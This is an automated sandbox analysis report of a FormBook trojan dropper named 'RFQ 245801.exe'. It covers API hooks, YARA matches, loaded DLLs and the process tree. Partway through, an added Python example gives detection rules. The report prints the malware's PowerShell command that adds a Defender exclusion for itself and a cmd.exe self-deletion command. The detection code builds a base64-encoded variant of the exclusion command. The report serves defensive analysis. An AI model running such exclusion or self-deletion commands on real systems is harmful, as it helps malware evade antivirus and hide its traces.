Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113D70 NtOpenThread, 7_2_03113D70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA330 NtCreateFile, 7_2_026BA330
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA3E0 NtReadFile, 7_2_026BA3E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA460 NtClose, 7_2_026BA460
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA510 NtAllocateVirtualMemory, 7_2_026BA510
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA2EA NtCreateFile, 7_2_026BA2EA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA32A NtCreateFile, 7_2_026BA32A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA3DA NtReadFile, 7_2_026BA3DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA45E NtClose, 7_2_026BA45E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA50A NtAllocateVirtualMemory, 7_2_026BA50A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 7_2_02EE9BAF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 7_2_02EEA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_02EE9BB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_02EEA042 NtQueryInformationProcess, 7_2_02EEA042
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_029EE828 0_2_029EE828
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_0733AAF8 0_2_0733AAF8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332620 0_2_07332620
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332A58 0_2_07332A58
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07332A48 0_2_07332A48
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07334100 0_2_07334100
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073321E8 0_2_073321E8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073349D8 0_2_073349D8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_073349C7 0_2_073349C7
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 0_2_07330006 0_2_07330006
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041D89D 5_2_0041D89D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DA88 5_2_0041DA88
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DBA8 5_2_0041DBA8
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409E5B 5_2_00409E5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409E60 5_2_00409E60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041DFD5 5_2_0041DFD5
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041E792 5_2_0041E792
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0315F290 appears 103 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 030CB970 appears 262 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0314EA12 appears 86 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03115130 appears 58 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03127E54 appears 102 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 017AF290 appears 103 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 01777E54 appears 107 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 0171B970 appears 262 times
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: String function: 01765130 appears 58 times
Source: RFQ 245801.exe Static PE information: invalid certificate
Source: RFQ 245801.exe, 00000000.00000002.1744400565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000000.1688427062.00000000006CC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000000.00000002.1753756214.00000000072B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
Source: RFQ 245801.exe, 00000005.00000002.1799833129.000000000181D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ 245801.exe
Source: RFQ 245801.exe Binary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
Source: RFQ 245801.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: RFQ 245801.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.SetAccessControl
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.cs Security API names: _0020.AddAccessRule
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@13/6@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 7_2_00641CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00641C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 7_2_00641C89
Source: C:\Users\user\Desktop\RFQ 245801.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 245801.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Users\user\Desktop\RFQ 245801.exe Mutant created: \Sessions\1\BaseNamedObjects\WIAEYG
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpfsdf0.kdq.ps1
Source: RFQ 245801.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\RFQ 245801.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ 245801.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ 245801.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
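The process tree above is the whole FormBook story in four command lines: the dropper spawns powershell.exe with Add-MpPreference -ExclusionPath pointing at its own file on the Desktop, re-launches itself for process hollowing, the injected explorer.exe starts NETSTAT.EXE as the final host, and NETSTAT.EXE runs cmd.exe /c del to remove the dropper. A parent/child rule catches this even though every image involved is a signed Windows binary. The Python below is an added example, not part of the sandbox report: it runs two detections over constructed process-creation events modelled on those command lines. The exclusion rule also decodes a base64 -EncodedCommand payload (UTF-16LE, as PowerShell expects), so the same cmdlet is caught when wrapped that way; the chain rule requires explorer.exe as the parent of netstat.exe and a cmd.exe child issuing del. The event field names, the pids and the encoded sample are assumptions.

```python
import base64
import binascii
import re

# Constructed process-creation events modelled on the command lines in this
# report. The field names (pid, ppid, image, cmdline) are an assumption, not
# the schema of any particular EDR or Sysmon deployment.
ENCODED_PAYLOAD = base64.b64encode(
    r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'".encode("utf-16-le")
).decode("ascii")

EVENTS = [
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1000, "ppid": 900, "image": r"C:\Users\user\Desktop\RFQ 245801.exe",
     "cmdline": r'"C:\Users\user\Desktop\RFQ 245801.exe"'},
    {"pid": 1001, "ppid": 1000,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"'},
    {"pid": 1002, "ppid": 1000, "image": r"C:\Users\user\Desktop\RFQ 245801.exe",
     "cmdline": r'"C:\Users\user\Desktop\RFQ 245801.exe"'},
    {"pid": 1003, "ppid": 900, "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "cmdline": r'"C:\Windows\SysWOW64\NETSTAT.EXE"'},
    {"pid": 1004, "ppid": 1003, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\RFQ 245801.exe"'},
    # Benign activity that must not fire: an operator running netstat from a
    # shell, and a PowerShell session that only reads the Defender settings.
    {"pid": 1007, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 1008, "ppid": 1007, "image": r"C:\Windows\System32\NETSTAT.EXE",
     "cmdline": "netstat -ano"},
    {"pid": 1009, "ppid": 1007,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-MpPreference"},
    # Constructed base64 variant of the same exclusion, which a plain
    # substring match on "Add-MpPreference" would miss.
    {"pid": 1010, "ppid": 1007,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED_PAYLOAD},
]

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
EXCL_RE = re.compile(
    r"(?i)(?:Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"
    r"(?:\"([^\"]+)\"|'([^']+)'|(\S+))"
)
DEL_RE = re.compile(r"(?i)\bdel\b\s+(?:\"([^\"]+)\"|(\S+))")


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none.

    PowerShell expects base64 over UTF-16LE, so that is what is decoded here."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_defender_exclusion(event):
    """Flag powershell.exe / pwsh.exe adding a Defender exclusion, plain or encoded."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    text, encoded = event["cmdline"], False
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text, encoded = decoded, True
    m = EXCL_RE.search(text)
    if not m:
        return None
    value = next(g for g in m.groups()[1:] if g)
    return {"pid": event["pid"], "exclusion_type": m.group(1), "value": value, "encoded": encoded}


def detect_defender_exclusions(events):
    return [hit for hit in map(find_defender_exclusion, events) if hit]


def find_netstat_delete_chain(events):
    """explorer.exe -> NETSTAT.EXE -> cmd.exe /c del <file>: the injected explorer
    launches a signed system utility as the final host, which removes the dropper."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "netstat.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) != "explorer.exe":
            continue
        for child in events:
            if child["ppid"] == e["pid"] and basename(child["image"]) == "cmd.exe":
                m = DEL_RE.search(child["cmdline"])
                if m:
                    hits.append({"netstat_pid": e["pid"], "deleted": m.group(1) or m.group(2)})
    return hits


if __name__ == "__main__":
    for hit in detect_defender_exclusions(EVENTS):
        print("defender exclusion:", hit)
    for hit in find_netstat_delete_chain(EVENTS):
        print("netstat self-delete chain:", hit)
```

Both rules key on the parent relationship and the command line, not on the image path, because the sandbox shows the same chain running from SysWOW64 copies of the system binaries; a production rule would add Set-MpPreference -DisableRealtimeMonitoring and the other utilities FormBook picks as its final host alongside netstat.exe.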
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: netutils.dll
